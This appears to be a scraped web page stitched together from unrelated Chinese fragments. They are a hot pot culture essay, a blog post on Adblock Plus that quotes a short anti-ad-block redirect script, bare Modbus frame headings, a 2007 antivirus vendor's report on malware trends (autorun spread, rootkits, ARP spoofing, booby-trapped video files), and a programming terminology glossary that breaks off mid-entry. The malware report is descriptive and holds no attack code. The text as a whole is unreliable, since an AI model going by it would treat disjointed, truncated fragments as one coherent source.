　　与川味火锅相比，滇味火锅则“善变”，因为昆明人的口味是酸中带辣、酸中带甜、咸鲜 甜的混合口味，这个地方的人吃东西挑剔，图个新鲜、图个花样……似乎所有滇味火锅都在迎合着这些特点。他们的锅底各有各的味道和秘方，有的火锅糊而不燥、 辣而不焦、香味醇厚；有的火锅鲜花艳艳、花香四溢；有的火锅菌香味浓……而这些都因为香料的丰富。这个植物王国盛产几百种香料，由着厨师调配，要啥有啥， 刺激人们的味蕾。

　　与他们相比，沈阳火锅更讲究一个“情分”。在口味上沈阳人不挑，在历史上，沈阳人没 有四川人的老汤情节，与这些相比，沈阳人吃火锅注重情分、注重尽兴，羊肉不论片涮，一般一筷子下去就是半盘子，讲究吃饱而不是吃好，所以与其说沈阳人是在 涮火锅，倒不如煮火锅来得更贴切。

　　冻豆腐和大白菜是沈阳人吃火锅时永远离不开的两样看家宝，而且这里更有讲究，白菜要 水翻花后煮到入口能化，冻豆腐则要求不仅豆腐表面要有冰茬，豆腐里面的水更要全部结成冰，而且整个豆腐必须冻到出现大小不一的小孔，这样抛进锅里的冻豆腐 才会充分吸收火锅汤料中的水分，吃起来不但富有弹性，而且味道也格外鲜美可口。

　　吃惯了冻豆腐与大白菜的沈阳人与其他地方还不太一样的就是，沈阳女孩子吃火锅更为泼 辣，她们不太愿意落在男人们身后，杯中往往都是啤酒而不是碳酸饮料或解渴的茶水。走在沈阳的火锅店内你会时不时看到女孩子把蔬菜混着肉片蘸着调料一起塞进 嘴里，然后满满喝下一杯啤酒，接着继续大声地高谈阔论，有说有笑，根本不在乎别人的反应。这是吃惯菊花锅的江浙一带姑娘无法想像的事情。

　　麻辣火锅涮出沈阳人的火热

　　四川人能吃辣是全国闻名，其实沈阳人也不差，而且四川的麻辣火锅在沈阳简直就是第二故乡，带着“四川”、“重庆”、“巴蜀”字样的火锅店在沈阳更是比比皆是。

　　有研究表明，四川人之所以爱吃麻辣是因为历史上四川地区是花椒最重要的产地，历史上 便有“川椒”之称。沈阳由于地域特点，本没有吃麻辣的习惯，但四季分明的气候让沈阳人同样喜欢浓烈的口味，而讲究鲜辣的四川火锅，正如同东北人的浓烈粗犷 一样，十分投沈阳人的脾气，深红色的汤料就如同沈阳人热情好客的性格一样，吃出了一嘴的火热，并在火热中红便了沈阳的大街小巷。

　　沈阳人不在乎吃的为啥都是挂有“四川”字样的火锅，他们更在乎不管与谁一起吃火锅， 必须是自己请客，为了抢一份账单你推我夺的情况绝对不是偶然的事情，这与沈阳人自来外露、好胜、实在的性格传统有关，也传达着沈阳人相对简单的思维逻辑， 同样也体现着沈阳这座古城对于不同文化强大的包容能力。

　　不光是麻辣，几乎全国各地的火锅样式都可以在沈阳找到。在沈阳，有传统的北京“涮锅 子”，以羊肉为主要涮食，讲究的是羊的产地、羊肉的部位、切肉的刀法以及调料的调制，最后还不能忘了芝麻烧饼和糖蒜。还有长江以南的菊花锅，汤底是鸡清汤 加了虾米、笋片、火腿片和雪里蕻，涮食则可以是鸡胗、鱼肉、香菇等。广东的“打边炉”火锅也可以在沈阳找到，这种火锅在汤底方面特别讲究，汤底以清凉滋补 为主。

　　一口锅，一炉火，麻辣、鲜香、滚烫；大白菜、冻豆腐、宽粉条尽在其中，朴实简单的沈阳人，正是在这一口锅中“涮”出了时代的发展，生活的畅快和真情的流露……本报记者马光

根据作者的统计，每天世界上都会有三万到四万人成为新的 Adblock Plus 用户。不过，正是无处不在的牛皮癣小广告促进了我们的互联网可以像今天这样繁荣发展，没有商业的运作，所有的一切都是浮云。在这个世界上每天还有着像这样 的很多人：为了写一篇有质量的博客查阅了很多资料，补了很多功课，希望通过优秀的文章来换取网站的广告点击，用来购买空间域名，为了使自己的网站正常的运 转下去。每天都会有 30% 以上的用户使用 Firefox 登录这些博客，而这些 Firefox 大都很自豪的武装了 Adblock Plus。就这样，Firefox 越来越流行，博客们的日子越来越凄惨。

在这场由 Adblock Plus 掀起的消灭广告的网络革命中，Google Adsense 首当其冲成为了最大的受害者。可笑的是，在此前的一次平面媒体采访中，Adblock Plus 的继任开发者 Wladimir Palant 透露，原来他本人也是 Google Adsense 广告的 Fans 之一。Firefox 用户只要在 Wladimir Palant 写的 Adblock Plus 中添加一条很简单的命令就可以让 Google Adsense 在整个互联网上“扑”的一下子消失的无影无踪。于是就这样，Adblock Plus 偷走了全球无数博客们赖以维持生计的口粮。比如俺的 NiDaYe.orG，做为  Firefox 专题类的特别低调的博客，几乎所有的访客 UA 都是 Firefox，在过去的 14 天中 NiDaYe.orG 有将近 2000 次的访问，而放置的 Google Adsense 广告只有振奋人心的 12 次点击。

不甘心经济利益受损的博客们的确找不到对付 Adblock Plus 的办法，因为这个扩展真的太强大了。于是一些极端的同志们开始在自己的网站上封锁 Firefox 的访客，封锁的原理和我前些日子介绍的《如何屏蔽网站的 IE 访客》是一样的，就是在访客的 UA 中一旦检测到其中包含 firefox 的关键词，就立刻将这个访问进程转向到一个特定的网页。有位国外的愤青悲愤的建立了 whyfirefoxisblocked.com 这个网站，流着热泪向大家哭诉了自己封锁 Firefox 用户的初衷，以及具体的封锁教程。

相比之下，Danny Carlton 这位同志就显的理智多了，他选择了只封锁使用了 Adblock Plus 的访客，通过在网站中嵌一个 js，他成功的做到了这一点，不过也许我永远都不会使用这个 js：

function dieAdBlockPlusDie()
{
var giframe = document.getElementsByTagName("iframe");
var blocked=1;
for (var i = 0; i < giframe.length; i++)
{
var name = giframe[i].getAttribute("name");
if(name == "google_ads_frame")
{
var blocked=0;
}
}
if(blocked){window.location = 'http://articlewagon.com/thief.htm';}
}
setTimeout('dieAdBlockPlusDie()', 2000);

所有使用 Adblock Plus 屏蔽 Google Adsense 广告的访客，在访问嵌了这个 js 的网站时，都会被自动转向到 http://articlewagon.com/thief.htm 这个网页，在那里刻着几行 blogger 们用血和泪写下的大字：

Thieves are not welcome at this site !

通用Modbus帧

串行链路上的Modbus帧

TCP/IP上的Modbus帧

Modbus事务处理

Modbus通信全透明　　

    据江民反病毒预警中心、江民全球病毒监测网提供的数据显示，截至12月份，江民反病毒中心共截获计算机新病毒总数为363000余种，这一数字是2006年的六倍多，至此江民杀毒软件KV系列病毒库总量已经超过80万。2007年全年病毒累计感染电脑  34414793台，新病毒感染电脑台数为28879529台，其中木马病毒感染24875117  台，占病毒总数的72.28%；后门病毒感染1987821台，占病毒总数的5.78%；蠕虫病毒感染1556124台，占病毒总数的4.52%；流氓软件感染2502563台，占病毒总数的7.27%；脚本病毒80026台，占病毒总数的0.23%。  

    2007年上半年计算机病毒增长较为平缓，下半年计算机病毒增长迅猛，江民反病毒中心全年截获的病毒中，有三分之二的新病毒系下半年截获，平均日升级病毒数量近2000种。综合来看，2007年计算机病毒呈现以下特征：  

    一、AUTO类病毒发作率居高不下，移动存储安全堪扰  

    利有微软系统AUTORUN自动播放功能的病毒进入2007年以后一直居高不下， 几乎所有新的木马病毒都具备了这一传播特征。例如年度十大病毒“熊猫烧香”、“ANI病毒”等都可利用AUTORUN自动播放功能通过U盘传播。去年底和 今年年底爆发的“熊猫烧香”病毒导致上百万台电脑受到损害，而U盘正是病毒传播和藏身的主要介质。 “熊猫烧香”病毒会向U盘释放出一个名为“autorun.inf”的病毒文件，使用U盘的用户只要双击U盘，就会激活并运行病毒。“ANI病毒”同样具 有这一特征，病毒除了自我复制到各逻辑磁盘根目录下，创建“autorun.inf”自动播放配置文件，用户一旦双击盘符即可激活病毒，造成再次感染。许 多通过网页挂马传播的病毒均具有此类特征，普通用户即使格式化C盘重装系统，双击带毒U盘或其它硬盘分区，病毒仍然能够激活。

    据不完全统计，中国国内的U盘和移动硬盘的保有量在2006年已经突破 3000万只。U盘和移动硬盘已经成为了IT从业人员以及商务人士必备的基本沟通工具。如同当年的软盘一样，U盘已经成为最大的计算机病毒载体，保护U盘 等移动存储设备数据安全，阻止病毒通过U盘等移动存储设备疯狂传播，已经成为反病毒厂商面临的主要问题之一。

    二、应用软件漏洞成网页挂马新宠  

    众所周知，近几年以来，微软系统漏洞一直是网页木马的最主要传播途径。然而，2007年下半年，江民科技反病毒中心最新的监测结果显示，越来越多的病毒开始绕开微软系统漏洞，转而利用国产应用软件的漏洞传播。  

    江民科技反病毒中心最新的网页挂马漏洞监测结果显示，自2007年9月到11月这短短的三个月以来，国产应用软件漏洞已经超越了微软MS06-14和MS07-17这两大网页木马最常用的漏洞，成为网页挂马的“新宠”。  

    监测结果显示，9月初网页木马利用微软漏洞比例还高达90%，而进入10月以来网 页木马利用国产应用软件漏洞的比例大幅提高，到11月网页木马利用国产应用软件漏洞的比例达到了45%，而利用微软漏洞的比例仅为30%，网页挂马利用国 产应用软件漏洞进行传播已经成为病毒发展新趋势。

    三、自杀式病毒越来越多，隐蔽性更强  

    进入2007年以来，更多的病毒开始刻意隐藏自身，以此逃避杀毒软件查杀并更深地 潜伏在目标电脑中，在电脑用户毫无知觉的情况下完成盗号窃密过程。与去年“熊猫烧香”发作后在电脑中生成无处不在的熊猫图案不同，现在的病毒作者在编写病 毒时更加注重自身的隐蔽。病毒作者主要采用三大隐身术，通过RootKit技术隐藏病毒进程、病毒文件、隐藏数据传输端口以及注册表内键值；通过篡改注册 表相关键值屏蔽显示隐藏文件的功能；使用IEFO重定向劫持技术禁止杀毒软件运行。

    如“证券大盗”病毒在完成盗号目的后，就会自杀，清除所有自身留在电脑里的蛛 丝马迹，让受害者找不到任何破案线索；而灰鸽子(Backdoor/Huigezi)后门病毒、友好客户(Backdoor/PcClient)后门病 毒，以及部分版本的网游大盗(Trojan/PSW.GamePass)木马等，都采用RootKit技术编写，以达到隐藏自身，躲避检测，躲避查杀的目 的。

    四、ARP病毒多发 企业局域网受害严重  

    2007年上半年，江民科技就已经提出ARP病毒将成为病毒发展的一个新趋势，果 然在下半年，ARP类越来越多，几乎多数企业的网络故障均来自ARP病毒。ARP病毒也叫做ARP地址欺骗类病毒，是一类特殊的病毒。该病毒一般属于木马 病毒，不具备主动传播的特性，不会自我复制，但是由于其发作的时候会向全网发送伪造的ARP数据包，严重干扰全网的正常运行，其危害甚至比一些蠕虫病毒还 要严重得多。

    ARP病毒发作时，通常会造成网络掉线，但网络连接正常，内网的部分电脑不能 上网，或者所有电脑均不能上网，无法打开网页或打开网页慢以及局域网连接时断时续并且网速较慢等现象，严重影响到企业网络、网吧、校园网络等局域网的正常 运行。更为严重的是，近期网上流行的ARP病毒新变种出现了新特征，该类ARP病毒同样是向全网发送伪造的ARP欺骗广播，但病毒把自身伪装成网关，在所 有用户请求访问的网页添加恶意代码，导致杀毒软件在用户访问任意网站均发出病毒警报。

    五、越来越多的病毒通过视频文件传播  

    随着2007年BT以及播客的应用与繁荣，众多网民热衷于网上下载电影、电视等视 频文件，病毒开始瞄准这一传播途径大肆传播。黑客最常用的视频漏洞无疑应该是Real脚本漏洞。由于Real格式的视频文件可以内嵌一个网址，并在打开视 频文件时自动打开内嵌的网址，因此许多黑客在一些热门的视频文件内嵌入一个带有大量病毒的恶意网址。一旦网友下载并打开了该视频文件，即可从嵌入的恶意网 址中下载大量的病毒，轻者电脑运行缓慢直至死机，严重的中毒电脑将会成为黑客手中肉鸡，电脑内所有的数据和资料都可以被黑客轻易窃取。由于利用Real格 式的视频传播病毒非常简单方便，大量的网友中招，因此利用该漏洞的Exploit.JS.Real（Real脚本病毒）得以迅速蔓延，也因此被列入 2007年十大病毒之列。

英文                    繁体译词
                      （有些是侯捷个人喜好，普及与否难说）      大陆惯用术语
---------------------------------------------------------------------------------------
#define                 定义                                    预定义
abstract                抽象的                                  抽象的
abstraction             抽象体、抽象物、抽象性                  抽象体、抽象物、抽象性
access                  存取、取用                              存取、访问
access level            存取级别        访问级别
access function         存取函式                                访问函数
activate                活化                                    激活
active                  作用中的
adapter                 配接器                                  适配器
address                 位址                                    地址
address space           位址空间，定址空间
address-of operator     取址运算子                              取地址操作符
aggregation             聚合
algorithm               演算法                                  算法
allocate                配置                                    分配
allocator               （空间）配置器                          分配器
application             应用程式                                应用、应用程序
application framework   应用程式框架、应用框架                  应用程序框架
architecture            架构、系统架构                          体系结构
argument                引数（传给函式的值）。叁见 parameter    叁数、实质叁数、实叁、自变量
array                   阵列                                    数组
arrow operator          arrow（箭头）运算子                     箭头操作符
assembly                装配件
assembly language       组合语言                                汇编语言
assert(ion)                                                     断言
assign                  指派、指定、设值、赋值                  赋值
assignment              指派、指定                              赋值、分配
assignment operator     指派（赋值）运算子 =                    赋值操作符
associated              相应的、相关的                          相关的、关联、相应的
associative container   关联式容器（对应 sequential container） 关联式容器
atomic                  不可分割的                              原子的
attribute               属性                                    属性、特性
audio                   音讯                                    音频
A.I.                    人工智慧                                人工智能
background              背景                                    背景（用於图形着色）
                                                                  後台（用於行程）
backward compatible     回溯相容                                向下兼容                                                                  
bandwidth               频宽                                    带宽
base class              基础类别                                基类
base type               基础型别 (等同於 base class)
batch                   批次（意思是整批作业）                  批处理
benefit                 利益          收益
best viable function    最佳可行函式                            最佳可行函式
                      （从 viable functions 中挑出的最佳吻合者）
binary search           二分搜寻法                              二分查找
binary tree             二元树                                  二叉树
binary function         二元函式        双叁函数
binary operator         二元运算子                              二元操作符
binding                 系结                                    绑定
bit                     位元                                    位
bit field               位元栏 ?                                位域
bitmap                  位元图 ?                                位图
bitwise                 以 bit 为单元逐一┅                     ?
bitwise copy            以 bit 为单元进行复制；位元逐一复制     位拷贝
block                   区块,区段                               块、区块、语句块
boolean                 布林值（真假值，true 或 false）         布尔值
border                  边框、框线                              边框
brace(curly brace)      大括弧、大括号                          花括弧、花括号
bracket(square brakcet) 中括弧、中括号                          方括弧、方括号
breakpoint              中断点                                  断点
build                   建造、构筑、建置（MS 用语）
build-in                内建                                    内置
bus                     汇流排                                  总线
business                商务,业务                               业务
buttons                 按钮                                    按钮
byte                    位元组（由 8 bits 组成）                字节
cache                   快取                                    高速缓存
call                    呼叫、叫用                              调用
callback                回呼                                    回调
call operator           call（函式呼叫）运算子 ()               调用操作符
                      （同 function call operator）
candidate function      候选函式                                候选函数
                      （在函式多载决议程序中出现的候选函式）
chain                   串链（例 chain of function calls）      链
character               字元                                    字符
check box               核取方块 (i.e. check button)            复选框
checked exception       可控式异常(Java)
check button            方钮 (i.e. check box)                   复选按钮
child class             子类别（或称为derived class, subtype）  子类
class                   类别                                    类
class body              类别本体                                类体 ?
class declaration       类别宣告、类别宣告式                    类声明
class definition        类别定义、类别定义式                    类定义
class derivation list   类别衍化列                              类继承列表
class head              类别表头                                类头 ?
class hierarchy         类别继承体系, 类别阶层                  类层次体系
class library           类别程式库、类别库                      类库
class template          类别模板、类别范本                      类模板
class template partial specializations
                        类别模板偏特化                          类模板部分特化
class template specializations
                        类别模板特化                            类模板特化
cleanup                 清理、善後                              清理、清除
client                  客端、客户端、客户                      客户
client-server           主从架构                                客户/服务器
clipboard               剪贴簿                                  剪贴板
clone                   复制                                    克隆
                       (易与 copy 混淆）
                        "克隆" 是个可接受的译词，
                        反正有 "拷贝" 为前例）
                        如果做为动词译为 "克隆"
                        做为名词时最好译为 "克隆件"
                          相映於 copy 之 "复件" 
                        
collection              群集                                    集合 ?
combo box               复合方块、复合框                        组合框
command line            命令列                                  命令行
                       (系统文字模式下的整行执行命令)
communication           通讯                                    通讯
compatible              相容                                    兼容
compile time            编译期                                  编译期、编译时
compiler                编译器                                  编译器
component               组件                                    组件
composition             复合、合成、组合                        组合
computer                电脑、计算机                            计算机、电脑
concept                 概念                                    概念
concrete                具象的                                  实在的
concurrent              并行                                    并发
configuration           组态                                    配置
connection              连接，连线（网络,资料库）               连接
constraint              约束（条件）
construct               构件          构件
container               容器                                    容器
                      （存放资料的某种结构如 list, vector...）
containment             内含                                    包容                      
context                 背景关系、周遭环境、上下脉络            环境、上下文
control                 控制元件、控件                          控件
console                 主控台                                  控制台
const                   常数（constant 的缩写，C++ 关键字）
constant                常数（相对於 variable）                 常量
constructor（ctor）     建构式                                  构造函数
                        （与class 同名的一种 member functions）
copy (v)                复制、拷贝                              拷贝
copy (n)                复件, 副本
cover                   涵盖                                    覆盖
create                  创建、建立、产生、生成                  创建
creation                产生、生成                              创建
cursor                  游标                                    光标
custom                  订制、自定                              定制
data                    资料                                    数据
database                资料库                                  数据库
database schema                                                 数据库结构纲目
data member             资料成员、成员变数                      数据成员、成员变量
data structure          资料结构                                数据结构
datagram                资料元                                  数据报文
dead lock               死结                                    死锁
debug                   除错                                    调试
debugger                除错器                                  调试器
declaration             宣告、宣告式                            声明
deduction               推导（例：template argument deduction） 推导、推断
default                 预设                                    缺省、默认
defer                   延缓                                    推迟
definition              定义、定义区、定义式                    定义
delegate                委派、委托、委任      委托
delegation              （同上）
demarshal               反编列                                  散集
dereference             提领（取出指标所指物体的内容）          解叁考
dereference operator    dereference（提领）运算子 *             解叁考操作符
derived class           衍生类别                                派生类
design by contract      契约式设计
design pattern          设计范式、设计样式                      设计模式
                        ※ 最近我比较喜欢「设计范式」一词
destroy                 摧毁、销毁
destructor（dtor）      解构式                                  析构函数
device                  装置、设备                              设备
dialog                  对话窗、对话盒                          对话框
directive               指令（例：using directive）            (编译)指示符
directory               目录                                    目录
disk                    碟                                      盘
dispatch                分派                                    分派
distributed computing   分布式计算 (分布式电算)                 分布式计算
                        分散式计算 (分散式电算)
document                文件                                    文档
dot operator            dot（句点）运算子 .                     (圆)点操作符
driver                  驱动程式                                驱动（程序）
dynamic binding         动态系结                                动态绑定
efficiency              效率                                    效率
efficient               高效                                    高效
end user                终端用户
entity                  物体                                    实体、物体
encapsulation           封装                                    封装
enclosing class         外围类别（与巢状类别 nested class 有关）外围类
enum (enumeration)      列举（一种 C++ 资料型别）               枚举
enumerators             列举元（enum 型别中的成员）             枚举成员、枚举器
equal                   相等                                    相等
equality                相等性                                  相等性
equality operator       equality（等号）运算子  ==              等号操作符
equivalence             等价性、等同性、对等性                  等价性 
equivalent              等价、等同、对等                        等价
escape code             转义码                                  转义码
evaluate                评估、求值、核定                        评估
event                   事件                                    事件
event driven            事件驱动的                              事件驱动的
exception               异常情况                                异常
exception declaration   异常宣告（ref. C++ Primer 3/e, 11.3）   异常声明
exception handling      异常处理、异常处理机制                  异常处理、异常处理机制
exception specification 异常规格（ref. C++ Primer 3/e, 11.4）   异常规范
exit                    退离（指离开函式时的那一个执行点）      退出
explicit                明白的、明显的、显式                    显式
export                  汇出                                    引出、导出
expression              运算式、算式                            表达式
facility                设施、设备                              设施、设备
feature                 特性
field                   栏位,资料栏（Java）                     字段, 值域（Java）
file                    档案                                    文件
firmware                韧体                                    固件
flag                    旗标                                    标记
flash memory            快闪记忆体                              闪存
flexibility             弹性                                    灵活性                
flush                   清理、扫清                              刷新
font                    字型                                    字体
form                    表单（programming 用语）                �